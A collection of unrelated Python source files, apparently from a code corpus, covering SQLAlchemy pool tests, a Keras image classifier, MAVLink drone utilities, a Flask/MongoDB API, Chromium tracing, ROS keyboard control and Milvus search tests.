def checkout(self, con, record, proxy, num):
pass
class ListenCheckIn(InstrumentingListener):
def checkin(self, con, record):
pass
def _pool(**kw):
return pool.QueuePool(creator=lambda: dbapi.connect('foo.db'),
use_threadlocal=False, **kw)
def assert_listeners(p, total, conn, fconn, cout, cin):
for instance in (p, p.recreate()):
self.assert_(len(instance.listeners) == total)
self.assert_(len(instance._on_connect) == conn)
self.assert_(len(instance._on_first_connect) == fconn)
self.assert_(len(instance._on_checkout) == cout)
self.assert_(len(instance._on_checkin) == cin)
p = _pool()
assert_listeners(p, 0, 0, 0, 0, 0)
p.add_listener(ListenAll())
assert_listeners(p, 1, 1, 1, 1, 1)
p.add_listener(ListenConnect())
assert_listeners(p, 2, 2, 1, 1, 1)
p.add_listener(ListenFirstConnect())
assert_listeners(p, 3, 2, 2, 1, 1)
p.add_listener(ListenCheckOut())
assert_listeners(p, 4, 2, 2, 2, 1)
p.add_listener(ListenCheckIn())
assert_listeners(p, 5, 2, 2, 2, 2)
del p
snoop = ListenAll()
p = _pool(listeners=[snoop])
assert_listeners(p, 1, 1, 1, 1, 1)
c = p.connect()
snoop.assert_total(1, 1, 1, 0)
cc = c.connection
snoop.assert_in(cc, True, True, True, False)
c.close()
snoop.assert_in(cc, True, True, True, True)
del c, cc
snoop.clear()
# this one depends on immediate gc
c = p.connect()
cc = c.connection
snoop.assert_in(cc, False, False, True, False)
snoop.assert_total(0, 0, 1, 0)
del c, cc
lazy_gc()
snoop.assert_total(0, 0, 1, 1)
p.dispose()
snoop.clear()
c = p.connect()
c.close()
c = p.connect()
snoop.assert_total(1, 0, 2, 1)
c.close()
snoop.assert_total(1, 0, 2, 2)
# invalidation
p.dispose()
snoop.clear()
c = p.connect()
snoop.assert_total(1, 0, 1, 0)
c.invalidate()
snoop.assert_total(1, 0, 1, 1)
c.close()
snoop.assert_total(1, 0, 1, 1)
del c
lazy_gc()
snoop.assert_total(1, 0, 1, 1)
c = p.connect()
snoop.assert_total(2, 0, 2, 1)
c.close()
del c
lazy_gc()
snoop.assert_total(2, 0, 2, 2)
# detached
p.dispose()
snoop.clear()
c = p.connect()
snoop.assert_total(1, 0, 1, 0)
c.detach()
snoop.assert_total(1, 0, 1, 0)
c.close()
del c
snoop.assert_total(1, 0, 1, 0)
c = p.connect()
snoop.assert_total(2, 0, 2, 0)
c.close()
del c
snoop.assert_total(2, 0, 2, 1)
# recreated
p = p.recreate()
snoop.clear()
c = p.connect()
snoop.assert_total(1, 1, 1, 0)
c.close()
snoop.assert_total(1, 1, 1, 1)
c = p.connect()
snoop.assert_total(1, 1, 2, 1)
c.close()
snoop.assert_total(1, 1, 2, 2)
def test_listeners_callables(self):
dbapi = MockDBAPI()
def connect(dbapi_con, con_record):
counts[0] += 1
def checkout(dbapi_con, con_record, con_proxy):
counts[1] += 1
def checkin(dbapi_con, con_record):
counts[2] += 1
i_all = dict(connect=connect, checkout=checkout, checkin=checkin)
i_connect = dict(connect=connect)
i_checkout = dict(checkout=checkout)
i_checkin = dict(checkin=checkin)
for cls in (pool.QueuePool, pool.StaticPool):
counts = [0, 0, 0]
def _pool(**kw):
return cls(creator=lambda: dbapi.connect('foo.db'),
use_threadlocal=False, **kw)
def assert_listeners(p, total, conn, cout, cin):
for instance in (p, p.recreate()):
self.assert_(len(instance.listeners) == total)
self.assert_(len(instance._on_connect) == conn)
self.assert_(len(instance._on_checkout) == cout)
self.assert_(len(instance._on_checkin) == cin)
p = _pool()
assert_listeners(p, 0, 0, 0, 0)
p.add_listener(i_all)
assert_listeners(p, 1, 1, 1, 1)
p.add_listener(i_connect)
assert_listeners(p, 2, 2, 1, 1)
p.add_listener(i_checkout)
assert_listeners(p, 3, 2, 2, 1)
p.add_listener(i_checkin)
assert_listeners(p, 4, 2, 2, 2)
del p
p = _pool(listeners=[i_all])
assert_listeners(p, 1, 1, 1, 1)
c = p.connect()
assert counts == [1, 1, 0]
c.close()
assert counts == [1, 1, 1]
c = p.connect()
assert counts == [1, 2, 1]
p.add_listener(i_checkin)
c.close()
assert counts == [1, 2, 3]
def test_listener_after_oninit(self):
"""Test that listeners are called after OnInit is removed"""
called = []
def listener(*args):
called.append(True)
listener.connect = listener
engine = create_engine(testing.db.url)
engine.pool.add_listener(listener)
engine.execute(select([1])).close()
assert called, "Listener not called on connect"
class QueuePoolTest(PoolTestBase):
def testqueuepool_del(self):
self._do_testqueuepool(useclose=False)
def testqueuepool_close(self):
self._do_testqueuepool(useclose=True)
def _do_testqueuepool(self, useclose=False):
p = pool.QueuePool(creator=mock_dbapi.connect, pool_size=3,
max_overflow=-1, use_threadlocal=False)
def status(pool):
tup = pool.size(), pool.checkedin(), pool.overflow(), \
pool.checkedout()
print 'Pool size: %d Connections in pool: %d Current '\
'Overflow: %d Current Checked out connections: %d' % tup
return tup
c1 = p.connect()
self.assert_(status(p) == (3, 0, -2, 1))
c2 = p.connect()
self.assert_(status(p) == (3, 0, -1, 2))
c3 = p.connect()
self.assert_(status(p) == (3, 0, 0, 3))
c4 = p.connect()
self.assert_(status(p) == (3, 0, 1, 4))
c5 = p.connect()
self.assert_(status(p) == (3, 0, 2, 5))
c6 = p.connect()
self.assert_(status(p) == (3, 0, 3, 6))
if useclose:
c4.close()
c3.close()
c2.close()
else:
c4 = c3 = c2 = None
lazy_gc()
self.assert_(status(p) == (3, 3, 3, 3))
if useclose:
c1.close()
c5.close()
c6.close()
else:
c1 = c5 = c6 = None
lazy_gc()
self.assert_(status(p) == (3, 3, 0, 0))
c1 = p.connect()
c2 = p.connect()
self.assert_(status(p) == (3, 1, 0, 2), status(p))
if useclose:
c2.close()
else:
c2 = None
lazy_gc()
self.assert_(status(p) == (3, 2, 0, 1))
c1.close()
lazy_gc()
assert not pool._refs
def test_timeout(self):
p = pool.QueuePool(creator=mock_dbapi.connect, pool_size=3,
max_overflow=0, use_threadlocal=False,
timeout=2)
c1 = p.connect()
c2 = p.connect()
c3 = p.connect()
now = time.time()
try:
c4 = p.connect()
assert False
except tsa.exc.TimeoutError, e:
assert int(time.time() - now) == 2
def test_timeout_race(self):
# test a race condition where the initial connecting threads all race
# to queue.Empty, then block on the mutex. each thread consumes a
# connection as they go in. when the limit is reached, the remaining
# threads go in, and get TimeoutError; even though they never got to
# wait for the timeout on queue.get(). the fix involves checking the
# timeout again within the mutex, and if so, unlocking and throwing
# them back to the start of do_get()
p = pool.QueuePool(
creator = lambda: mock_dbapi.connect(delay=.05),
pool_size = 2,
max_overflow = 1, use_threadlocal = False, timeout=3)
timeouts = []
def checkout():
for x in xrange(1):
now = time.time()
try:
c1 = p.connect()
except tsa.exc.TimeoutError, e:
timeouts.append(time.time() - now)
continue
time.sleep(4)
c1.close()
threads = []
for i in xrange(10):
th = threading.Thread(target=checkout)
th.start()
threads.append(th)
for th in threads:
th.join()
assert len(timeouts) > 0
for t in timeouts:
assert t >= 3, "Not all timeouts were >= 3 seconds %r" % timeouts
            # normally, the timeout should be under 4 seconds,
# but on a loaded down buildbot it can go up.
assert t < 10, "Not all timeouts were < 10 seconds %r" % timeouts
def _test_overflow(self, thread_count, max_overflow):
gc_collect()
def creator():
time.sleep(.05)
return mock_dbapi.connect()
p = pool.QueuePool(creator=creator,
pool_size=3, timeout=2,
max_overflow=max_overflow)
peaks = []
def whammy():
for i in range(10):
try:
con = p.connect()
time.sleep(.005)
peaks.append(p.overflow())
con.close()
del con
except tsa.exc.TimeoutError:
pass
threads = []
for i in xrange(thread_count):
th = threading.Thread(target=whammy)
th.start()
threads.append(th)
for th in threads:
th.join()
self.assert_(max(peaks) <= max_overflow)
lazy_gc()
assert not pool._refs
def test_no_overflow(self):
self._test_overflow(40, 0)
def test_max_overflow(self):
self._test_overflow(40, 5)
def test_mixed_close(self):
p = pool.QueuePool(creator=mock_dbapi.connect, pool_size=3,
max_overflow=-1, use_threadlocal=True)
c1 = p.connect()
c2 = p.connect()
assert c1 is c2
c1.close()
c2 = None
assert p.checkedout() == 1
c1 = None
lazy_gc()
assert p.checkedout() == 0
lazy_gc()
assert not pool._refs
def test_weakref_kaboom(self):
p = pool.QueuePool(creator=mock_dbapi.connect, pool_size=3,
max_overflow=-1, use_threadlocal=True)
c1 = p.connect()
c2 = p.connect()
c1.close()
c2 = None
del c1
del c2
gc_collect()
assert p.checkedout() == 0
c3 = p.connect()
assert c3 is not None
def test_trick_the_counter(self):
"""this is a "flaw" in the connection pool; since threadlocal
uses a single ConnectionFairy per thread with an open/close
counter, you can fool the counter into giving you a
        ConnectionFairy with an ambiguous counter, i.e. it's not true
reference counting."""
p = pool.QueuePool(creator=mock_dbapi.connect, pool_size=3,
max_overflow=-1, use_threadlocal=True)
c1 = p.connect()
c2 = p.connect()
assert c1 is c2
c1.close()
c2 = p.connect()
c2.close()
self.assert_(p.checkedout() != 0)
c2.close()
self.assert_(p.checkedout() == 0)
def test_recycle(self):
p = pool.QueuePool(creator=mock_dbapi.connect, pool_size=1,
max_overflow=0, use_threadlocal=False,
recycle=3)
c1 = p.connect()
c_id = id(c1.connection)
c1.close()
c2 = p.connect()
assert id(c2.connection) == c_id
c2.close()
time.sleep(4)
c3 = p.connect()
assert id(c3.connection) != c_id
def test_invalidate(self):
dbapi = MockDBAPI()
p = pool.QueuePool(creator=lambda : dbapi.connect('foo.db'),
pool_size=1, max_overflow=0,
use_threadlocal=False)
c1 = p.connect()
c_id = c1.connection.id
c1.close()
c1 = None
c1 = p.connect()
assert c1.connection.id == c_id
c1.invalidate()
c1 = None
c1 = p.connect()
assert c1.connection.id != c_id
def test_recreate(self):
dbapi = MockDBAPI()
p = pool.QueuePool(creator=lambda : dbapi.connect('foo.db'),
pool_size=1, max_overflow=0,
use_threadlocal=False)
p2 = p.recreate()
assert p2.size() == 1
assert p2._use_threadlocal is False
assert p2._max_overflow == 0
def test_reconnect(self):
"""tests reconnect operations at the pool level. SA's
engine/dialect includes another layer of reconnect support for
'database was lost' errors."""
dbapi = MockDBAPI()
p = pool.QueuePool(creator=lambda : dbapi.connect('foo.db'),
pool_size=1, max_overflow=0,
use_threadlocal=False)
c1 = p.connect()
c_id = c1.connection.id
c1.close()
c1 = None
c1 = p.connect()
assert c1.connection.id == c_id
dbapi.raise_error = True
c1.invalidate()
c1 = None
c1 = p.connect()
assert c1.connection.id != c_id
def test_detach(self):
dbapi = MockDBAPI()
p = pool.QueuePool(creator=lambda : dbapi.connect('foo.db'),
pool_size=1, max_overflow=0,
use_threadlocal=False)
c1 = p.connect()
c1.detach()
c_id = c1.connection.id
c2 = p.connect()
assert c2.connection.id != c1.connection.id
dbapi.raise_error = True
c2.invalidate()
c2 = None
c2 = p.connect()
assert c2.connection.id != c1.connection.id
con = c1.connection
assert not con.closed
c1.close()
assert con.closed
def test_threadfairy(self):
p = pool.QueuePool(creator=mock_dbapi.connect, pool_size=3,
max_overflow=-1, use_threadlocal=True)
c1 = p.connect()
c1.close()
c2 = p.connect()
assert c2.connection is not None
class SingletonThreadPoolTest(PoolTestBase):
def test_cleanup(self):
"""test that the pool's connections are OK after cleanup() has
been called."""
p = pool.SingletonThreadPool(creator=mock_dbapi.connect,
pool_size=3)
def checkout():
for x in xrange(10):
c = p.connect()
assert c
c.cursor()
c.close()
time.sleep(.1)
threads = []
for i in xrange(10):
th = threading.Thread(target=checkout)
th.start()
threads.append(th)
for th in threads:
th.join()
assert len(p._all_conns) == 3
class NullPoolTest(PoolTestBase):
def test_reconnect(self):
dbapi = MockDBAPI()
p = pool.NullPool(creator = lambda: dbapi.connect('foo.db'))
c1 = p.connect()
c_id = c1.connection.id
c1.close(); c1=None
c1 = p.connect()
dbapi.raise_error = True
c1.invalidate()
c1 = None
c1 = p.connect()
assert c1.connection.id != c_id
class StaticPoolTest(PoolTestBase):
def test_recreate(self):
dbapi = MockDBAPI()
creator = lambda: dbapi.connect('foo.db')
p = pool.StaticPool(creator)
p2 = p.recreate()
assert p._creator is p2._creator
|
predict.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sat May 12 10:08:11 2018
@author: rakshith
"""
import os, time
import numpy as np
import argparse
from keras.models import load_model
from keras.preprocessing import image
from multiprocessing import Process
PATH = os.getcwd()
CLASSES = ['Cat', 'Dog']
print_string = ''
def wait():
"""This method is used for printing wait process.
"""
animation = "|/-\\"
idx = 0
    while True:
print('[\033[92m INFO \033[0m] '+print_string+' '+animation[idx % len(animation)], end="\r")
idx += 1
time.sleep(0.1)
def start_animation():
"""Start printing function as another process.
"""
global p1
p1 = Process(target=wait)
p1.start()
def stop_animation():
"""Kills the process.
"""
p1.terminate()
def predict(img_path, model):
img = image.load_img(img_path, target_size=(224, 224))
x = image.img_to_array(img)
x = np.expand_dims(x, axis=0)
preds = model.predict(x)
return preds
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--image', default = 'test_images/2.jpeg')
parser.add_argument('--model', default = 'resnet50_best.h5')
args = parser.parse_args()
model_path = PATH+'/'+(args.model)
os.system('clear')
print_string='Loading Model'
start_animation()
t0 = time.time()
model = load_model(model_path)
t1 = time.time()
stop_animation()
print('[\033[92m INFO \033[0m] Loaded model ')
print('[\033[92m INFO \033[0m] Loaded in: {0:.2f}s'.format(t1-t0))
test_path = PATH+'/'+(args.image)
preds = predict(test_path, model)
y_classes = preds.argmax(axis=-1)
print('[\033[96m RESULT \033[0m] Probability Vector: ',preds)
print('[\033[96m RESULT \033[0m] Class: ',CLASSES[y_classes[0]])
|
main_utils.py
|
# Copyright 2020, NTRobotics
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import threading
import time
from pymavlink.mavutil import mavlink, mavlink_connection
def _send_heartbeat(connection, armed=False):
    base_mode = 0b10000000 if armed else 0b00000000  # bit 7 = MAV_MODE_FLAG_SAFETY_ARMED
while connection._ntr_sending_heartbeat:
connection.mav.heartbeat_send(mavlink.MAV_TYPE_GCS, mavlink.MAV_AUTOPILOT_INVALID, base_mode, 0, 0)
time.sleep(1)
def start_sending_heartbeat(connection, armed=False):
connection._ntr_sending_heartbeat = True
connection._ntr_heartbeat_thread = threading.Thread(target=_send_heartbeat, args=(connection, armed,), daemon=True)
connection._ntr_heartbeat_thread.start()
def stop_sending_heartbeat(connection):
connection._ntr_sending_heartbeat = False
connection._ntr_heartbeat_thread.join()
def send_command(connection, command, param1=0, param2=0, param3=0, param4=0, param5=0, param6=0, param7=0, blocking=False):
connection.mav.command_long_send(
connection.target_system,
connection.target_component,
command, confirmation=0,
param1=param1, param2=param2, param3=param3, param4=param4, param5=param5, param6=param6, param7=param7
)
if blocking:
response = connection.recv_match(type='COMMAND_ACK', condition=('COMMAND_ACK.command == %d' % command), blocking=True)
return response.result
def reboot(connection):
result = send_command(connection, mavlink.MAV_CMD_PREFLIGHT_REBOOT_SHUTDOWN, blocking=True, param2=1)
return (result == mavlink.MAV_RESULT_ACCEPTED)
def shutdown(connection):
result = send_command(connection, mavlink.MAV_CMD_PREFLIGHT_REBOOT_SHUTDOWN, blocking=True, param2=2)
return (result == mavlink.MAV_RESULT_ACCEPTED)
def connect():
f = open('navblock_ip.txt')
try:
ip = f.read()
finally:
f.close()
return mavlink_connection('udpout:%s:14540' % (ip), source_system=1, source_component=0, dialect='common')
def handle_statustext(connection, msg):
if msg.get_type() != 'STATUSTEXT':
raise TypeError('Wrong type of message')
if not connection.mavlink20():
print(msg.text)
return
if msg.id == 0:
print(msg.text)
return
try:
connection._ntr_statustext_buffer[msg.id][msg.chunk_seq] = msg.text
except AttributeError:
connection._ntr_statustext_buffer = { msg.id: { msg.chunk_seq: msg.text } }
except KeyError:
connection._ntr_statustext_buffer[msg.id] = { msg.chunk_seq: msg.text }
if len(msg.text) < 50:
msg_sequence = connection._ntr_statustext_buffer[msg.id]
text = ''
prev_chunk_seq = min(msg_sequence) - 1
if prev_chunk_seq != -1:
text += '{...}'
for chunk_seq in sorted(msg_sequence):
if (prev_chunk_seq + 1) != chunk_seq:
text += '{...}'
text += msg_sequence[chunk_seq]
prev_chunk_seq = chunk_seq
print()
print(text)
connection._ntr_statustext_buffer.pop(msg.id)
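# Hedged usage sketch (not part of the original module): how these helpers are
# intended to compose. Assumes navblock_ip.txt exists next to this file and a
# vehicle is reachable on UDP port 14540; the flow below is illustrative only.
if __name__ == '__main__':
    conn = connect()
    start_sending_heartbeat(conn)
    try:
        conn.wait_heartbeat()                 # block until the vehicle answers
        print('reboot accepted:', reboot(conn))
    finally:
        stop_sending_heartbeat(conn)
        conn.close()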
|
flask_server.py
|
"""
All responses have
mimetype="application/json",
headers={"Access-Control-Allow-Origin": "*"}
"""
from flask import Flask, request, Response
from logger_mongo import run_logger
from multiprocessing import Process
import time
import json
import logging
import pprint
import pymongo
app = Flask(__name__)
# pymongo note: if top > col.count() or top == 0, col.count() documents are returned (i.e. the whole collection)
def get_data(prefix, top_min=1, top_max=100):
"""
Returns request.args["top"] last entries from prefix+request.args["pair"]
:param prefix: prefix of collection to be used: log_ or tech_
:param top_min: minimum allowed number of last orders to be requested
:param top_max: maximum allowed number of last orders to be requested
:return: Flask response_class with appropriate status and error message if required
"""
# Processing 'pair' parameter
if "pair" not in request.args:
return {"error": "Mandatory parameter 'pair' is absent"}, 400
col_name = prefix + request.args["pair"]
if col_name not in col_names:
return {"error": 'Not supported currency pair'}, 400
# Processing 'top' parameter (if present)
if "top" not in request.args:
top = 1
else:
try:
top = int(request.args["top"])
except ValueError:
return {"error": "Parameter 'top' must be non-negative integer"}, 400
if top < top_min or top > top_max:
return {"error": "Parameter 'top' must satisfy inequality 0 < 'top' <= 100"}, 400
# Fetching 'top' last entries for 'pair' from database
col = db[col_name]
try:
db_response = list(col.find(
projection={"_id": False},
limit=top,
sort=[("_id", pymongo.DESCENDING)])
)
return db_response, 200
except Exception as e:
print(type(e))
print(e)
return {"error": "Some problems with database occurred"}, 500
def generate_response(data, status):
# Processing 'pretty' parameter
if "pretty" not in request.args:
pretty = False
else:
if request.args["pretty"] == "1":
pretty = True
else:
pretty = False
if pretty:
return app.response_class(
response=pprint.pformat(data),
status=status,
mimetype="text/plain",
headers={"Access-Control-Allow-Origin": "*"}
)
else:
return app.response_class(
response=json.dumps(data),
status=status,
mimetype="application/json",
headers={"Access-Control-Allow-Origin": "*"}
)
@app.route('/get_pairs', methods=['GET'])
def get_pairs():
data = pairs
status = 200
return generate_response(data, status)
@app.route('/get_tech', methods=['GET'])
def get_tech_data():
data, status = get_data('tech_')
return generate_response(data, status)
@app.route('/', methods=['GET'])
def get_log_data():
data, status = get_data('log_')
return generate_response(data, status)
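# Illustrative requests (the pair names are hypothetical; valid pairs come from
# mongo_config.json at runtime):
#   GET /get_pairs                       -> list of configured pairs
#   GET /get_tech?pair=btc_usd&top=5     -> last 5 entries of tech_btc_usd
#   GET /?pair=btc_usd&top=10&pretty=1   -> last 10 log_btc_usd entries, pretty-printed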
if __name__ == '__main__':
# Initialization
mongo_config = json.load(open('mongo_config.json'))
mongo_path = mongo_config['auth_string']
db_name = mongo_config['database']
config_file = mongo_config['orders_config']
limit = mongo_config['limit']
pairs = mongo_config['pairs']
# Logging to MongoDB
# for pair in pairs:
# p = Process(target=run_logger, args=(pair, limit, config_file, mongo_path, db_name))
# p.start()
# time.sleep(0.3)
# time.sleep(120)
# Connecting to database for server requests
client = pymongo.MongoClient(mongo_path) # defaults to port 27017
db = client[db_name]
col_names = set(db.collection_names())
# Flask logging
logger = logging.getLogger('werkzeug')
handler = logging.FileHandler('access.log')
logger.addHandler(handler)
app.logger.addHandler(handler)
# Starting server
app.run(host='0.0.0.0')
|
tarea_6.py
|
import threading
import math
factorial_bunch = []
def calculate_factorial(begin, end, step, n):
    # Each thread sums its share of the terms floor(n / 5**i); the combined
    # total is the exponent of 5 in n!, i.e. the number of trailing zeros of n!.
    result = 0
    for i in range(begin, end, step):
        result += n // 5**i  # integer division keeps the result exact for large n
    factorial_bunch.append(result)
if __name__ == "__main__":
process = 4
    # process = int(input('Enter the number of threads: '))
    # n = 10000
    n = int(input('Enter the value of n: '))
kmax = int(math.log(n)/math.log(5))
threads = []
for i in range(1, process+1):
threads.append(threading.Thread(target=calculate_factorial, args=(i, kmax+1, process, n)))
threads[-1].start()
for i in range(process):
threads[i].join()
print(sum(factorial_bunch))
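# Hedged cross-check, not part of the original script: the single-threaded
# equivalent of the threaded sum above (Legendre's formula for the exponent of
# 5 in n!, i.e. the number of trailing zeros of n!).
def trailing_zeros_of_factorial(n):
    total, power = 0, 5
    while power <= n:
        total += n // power
        power *= 5
    return total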
|
tracing_backend.py
|
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import cStringIO
import json
import logging
import socket
import threading
from telemetry.core import util
from telemetry.core.chrome import trace_result
from telemetry.core.chrome import websocket
from telemetry.core.timeline import model
class TracingUnsupportedException(Exception):
pass
class TraceResultImpl(object):
def __init__(self, tracing_data):
self._tracing_data = tracing_data
def Serialize(self, f):
f.write('{"traceEvents": [')
d = self._tracing_data
# Note: we're not using ','.join here because the strings that are in the
# tracing data are typically many megabytes in size. In the fast case, f is
# just a file, so by skipping the in memory step we keep our memory
# footprint low and avoid additional processing.
if len(d) == 0:
pass
elif len(d) == 1:
f.write(d[0])
else:
f.write(d[0])
for i in range(1, len(d)):
f.write(',')
f.write(d[i])
f.write(']}')
def AsTimelineModel(self):
f = cStringIO.StringIO()
self.Serialize(f)
return model.TimelineModel(event_data=f.getvalue())
class TracingBackend(object):
def __init__(self, devtools_port):
debugger_url = 'ws://localhost:%i/devtools/browser' % devtools_port
self._socket = websocket.create_connection(debugger_url)
self._next_request_id = 0
self._cur_socket_timeout = 0
self._thread = None
self._tracing_data = []
def BeginTracing(self, custom_categories=None):
self._CheckNotificationSupported()
req = {'method': 'Tracing.start'}
if custom_categories:
req['params'] = {'categories': custom_categories}
self._SyncRequest(req)
# Tracing.start will send asynchronous notifications containing trace
# data, until Tracing.end is called.
self._thread = threading.Thread(target=self._TracingReader)
self._thread.start()
def EndTracing(self):
req = {'method': 'Tracing.end'}
self._SyncRequest(req)
self._thread.join()
self._thread = None
def GetTraceResultAndReset(self):
assert not self._thread
ret = trace_result.TraceResult(
TraceResultImpl(self._tracing_data))
self._tracing_data = []
return ret
def Close(self):
if self._socket:
self._socket.close()
self._socket = None
def _TracingReader(self):
while self._socket:
try:
data = self._socket.recv()
if not data:
break
res = json.loads(data)
logging.debug('got [%s]', data)
if 'Tracing.dataCollected' == res.get('method'):
value = res.get('params', {}).get('value')
self._tracing_data.append(value)
elif 'Tracing.tracingComplete' == res.get('method'):
break
except (socket.error, websocket.WebSocketException):
logging.warning('Timeout waiting for tracing response, unusual.')
def _SyncRequest(self, req, timeout=10):
self._SetTimeout(timeout)
req['id'] = self._next_request_id
self._next_request_id += 1
data = json.dumps(req)
logging.debug('will send [%s]', data)
self._socket.send(data)
def _SetTimeout(self, timeout):
if self._cur_socket_timeout != timeout:
self._socket.settimeout(timeout)
self._cur_socket_timeout = timeout
def _CheckNotificationSupported(self):
"""Ensures we're running against a compatible version of chrome."""
req = {'method': 'Tracing.hasCompleted'}
self._SyncRequest(req)
while True:
try:
data = self._socket.recv()
except (socket.error, websocket.WebSocketException):
raise util.TimeoutException(
'Timed out waiting for reply. This is unusual.')
logging.debug('got [%s]', data)
res = json.loads(data)
if res['id'] != req['id']:
logging.debug('Dropped reply: %s', json.dumps(res))
continue
if res.get('response'):
raise TracingUnsupportedException(
'Tracing not supported for this browser')
elif 'error' in res:
return
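# Hedged usage sketch (not part of the original module): the intended call
# sequence for this backend. The devtools port value is hypothetical.
#   backend = TracingBackend(devtools_port=9222)
#   backend.BeginTracing()
#   # ... drive the browser while Tracing.dataCollected notifications stream in
#   backend.EndTracing()
#   trace = backend.GetTraceResultAndReset()
#   backend.Close()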
|
key_control.py
|
#!/usr/bin/env python3
import sys, tty, termios
import threading
import rospy
from std_msgs.msg import Float64
# input variables
ch = ''
def read_input():
global ch
while True:
fd = sys.stdin.fileno()
old_settings = termios.tcgetattr(fd)
try:
tty.setraw(sys.stdin.fileno())
ch = sys.stdin.read(1)
finally:
termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)
        # interpreting input
if ch=='h':
show_help()
elif ch == 'x':
break
elif ch=='q':
cur_cmd[0] += 0.1
if cur_cmd[0] > 3.14:
cur_cmd[0] = 3.14
elif ch=='e':
cur_cmd[0] -= 0.1
if cur_cmd[0] < -3.14:
cur_cmd[0] = -3.14
elif ch=='d':
cur_cmd[1] -= 0.1
if cur_cmd[1] < -3.14:
cur_cmd[1] = -3.14
elif ch=='a':
cur_cmd[1] += 0.1
if cur_cmd[1] > 0.19:
cur_cmd[1] = 0.19
elif ch=='w':
cur_cmd[2] -= 0.1
if cur_cmd[2] < -2:
cur_cmd[2] = -2
elif ch=='s':
cur_cmd[2] += 0.1
if cur_cmd[2] > 1.5708:
cur_cmd[2] = 1.5708
elif ch=='p':
cur_cmd[3] += 0.001
if cur_cmd[3] > 0.055:
cur_cmd[3] = 0.055
elif ch=='o':
cur_cmd[3] -= 0.001
if cur_cmd[3] < 0:
cur_cmd[3] = 0
else:
print('\nInvalid input. Press h to see help.\n')
def show_help():
print('\nControl the human_arm using keyboard with following keys')
print('q - move body CCW')
print('e - move body CW')
print('d - move shoulder right')
print('a - move shoulder left')
print('w - move upper arm up')
print('s - move upper arm down')
print('p - close gripper')
print('o - open gripper')
print('h - to show this help')
print('x - to exit')
def send_cmds():
for i in range(0,4):
if prev_cmd[i] != cur_cmd[i]:
if i == 0:
body_pub.publish(cur_cmd[i])
elif i == 1:
shoulder_pub.publish(cur_cmd[i])
elif i == 2:
upper_arm_pub.publish(cur_cmd[i])
elif i == 3:
gripper_pub.publish(cur_cmd[i])
prev_cmd[i] = cur_cmd[i]
#print(cur_cmd)
rate.sleep()
if __name__ == '__main__':
# Control variables
prev_cmd = [0,0,0,0] # 0 - body | 1 - shoulder | 2 - upper arm | 3 - gripper
cur_cmd = [0,0,0,0]
# initialize the node
rospy.init_node('human_arm_key_control', anonymous=False)
# define publishers
body_pub = rospy.Publisher('/human_arm/body_joint_controller/command', Float64, queue_size=1000)
shoulder_pub = rospy.Publisher('/human_arm/shoulder_move_1_joint_controller/command', Float64, queue_size=1000)
upper_arm_pub = rospy.Publisher('/human_arm/upper_arm_joint_controller/command', Float64, queue_size=1000)
gripper_pub = rospy.Publisher('/human_arm/gripper_finger_joint_controller/command', Float64, queue_size=1000)
# background daemon thread to take user input
th_user_input = threading.Thread(target=read_input)
th_user_input.daemon = True
th_user_input.start()
rate = rospy.Rate(8)
try:
show_help()
while not (rospy.is_shutdown() or ch=='x'):
send_cmds()
except rospy.ROSInterruptException:
pass
finally:
print('Ended human_arm key_control.')
|
test_search_20.py
|
import threading
import time
import pytest
import random
import numpy as np
from base.client_base import TestcaseBase
from utils.util_log import test_log as log
from common import common_func as cf
from common import common_type as ct
from common.common_type import CaseLabel, CheckTasks
prefix = "search_collection"
search_num = 10
max_dim = ct.max_dim
epsilon = ct.epsilon
gracefulTime = ct.gracefulTime
default_nb = ct.default_nb
default_nb_medium = ct.default_nb_medium
default_nq = ct.default_nq
default_dim = ct.default_dim
default_limit = ct.default_limit
default_search_exp = "int64 >= 0"
default_search_field = ct.default_float_vec_field_name
default_search_params = ct.default_search_params
default_int64_field_name = ct.default_int64_field_name
default_float_field_name = ct.default_float_field_name
vectors = [[random.random() for _ in range(default_dim)] for _ in range(default_nq)]
class TestCollectionSearchInvalid(TestcaseBase):
""" Test case of search interface """
@pytest.fixture(scope="function", params=ct.get_invalid_vectors)
def get_invalid_vectors(self, request):
yield request.param
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_invalid_fields_type(self, request):
if isinstance(request.param, str):
pytest.skip("string is valid type for field")
yield request.param
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_invalid_fields_value(self, request):
if not isinstance(request.param, str):
pytest.skip("field value only support string")
if request.param == "":
pytest.skip("empty field is valid")
yield request.param
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_invalid_metric_type(self, request):
yield request.param
@pytest.fixture(scope="function", params=ct.get_invalid_ints)
def get_invalid_limit(self, request):
if isinstance(request.param, int) and request.param >= 0:
pytest.skip("positive int is valid type for limit")
yield request.param
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_invalid_expr_type(self, request):
if isinstance(request.param, str):
pytest.skip("string is valid type for expr")
        if request.param is None:
pytest.skip("None is valid for expr")
yield request.param
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_invalid_expr_value(self, request):
if not isinstance(request.param, str):
pytest.skip("expression value only support string")
if request.param == "":
pytest.skip("empty field is valid")
yield request.param
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_invalid_partition(self, request):
if request.param == []:
pytest.skip("empty is valid for partition")
        if request.param is None:
pytest.skip("None is valid for partition")
yield request.param
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_invalid_output_fields(self, request):
if request.param == []:
pytest.skip("empty is valid for output_fields")
        if request.param is None:
pytest.skip("None is valid for output_fields")
yield request.param
"""
******************************************************************
# The followings are invalid cases
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L1)
def test_search_no_connection(self):
"""
target: test search without connection
method: create and delete connection, then search
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix)[0]
# 2. remove connection
log.info("test_search_no_connection: removing connection")
